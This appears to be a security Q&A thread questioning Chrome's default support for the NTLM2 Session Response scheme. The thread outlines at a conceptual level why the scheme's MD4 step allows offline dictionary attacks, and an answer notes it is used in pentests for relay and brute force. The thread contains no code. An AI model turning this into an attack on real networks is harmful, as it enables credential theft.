0

I've been looking at the NTML2 Session Response which is apparently supported transparently by commonly used browsers. NOTE: This is not to be confused with full NTLMv2 authentication. This in-depth and detailed explanation describes the core process.

The upshot: this scheme is known to be subject to offline dictionary attacks as discussed in this presentation from 2004. One of the main issues is that it creates a MD4 hash of two bytes which means you can compute the 65536 possible results for that part of the response for any given challenge and client nonce and rule out (generally) 65535 out of 65536 passwords by doing just the MD4 hash.

What I find really surprising is that Chrome is 'willing' to engage in this scheme (IE: not surprised). Disabling this option on a given server manageable but that doesn't prevent people from setting up simple web pages that will silently negotiate with the browser to send the insecure response. Am I wrong to think this it's irresponsible to make this the default behavior? Shouldn't this be opt-in given the risks and how esoteric this is?

On a side note, if anyone has any reference on what rate of MD4 generation is achievable, please respond. I can find things for MD5 but I believe MD4 is easier.

JimmyJames
  • 2,956
  • 2
  • 16
  • 25
  • It's not esoteric. It's not supported by web-browsers well and other software doesn't support it at all. It's the most common nightmare of corporate networks. The thing is that it is basically used on web proxies with Active Directory. It's used in corporate LANs to authenticate users to access the internet. Like a password on proxy. Regarding authentication on the websites, nobody is really using it except for some LAN applications. – Aria Sep 22 '16 at 21:58
  • @Aria "nobody is really using it except for some LAN applications" Can you provide some evidence of this? I think you are probably right. I have seen it in use on internal networks. That's still an issue. Perimeter security is a joke. – JimmyJames Sep 23 '16 at 13:48

1 Answers1

1

Sending your logged in user credentials (SSO) is limited only to the intranet zone. http based NTLM authentication is widely used inside corporate networks and is not considered a security risk unless an attacker managed to get a foothold inside your network. (which will happen)

By default the intranet zone is defined by anything that's in the same subnet as you, the same DNS suffix as you, local proxy exclusions or anything that you manually defined.

This is still a good attack vector to gain credentials assuming you managed to get into the corporate network, and i've used it many times when pentesting networks. (for NTLM reflection/relay, or just as to brute force the password)

Jonathan Allon
  • 721
  • 3
  • 14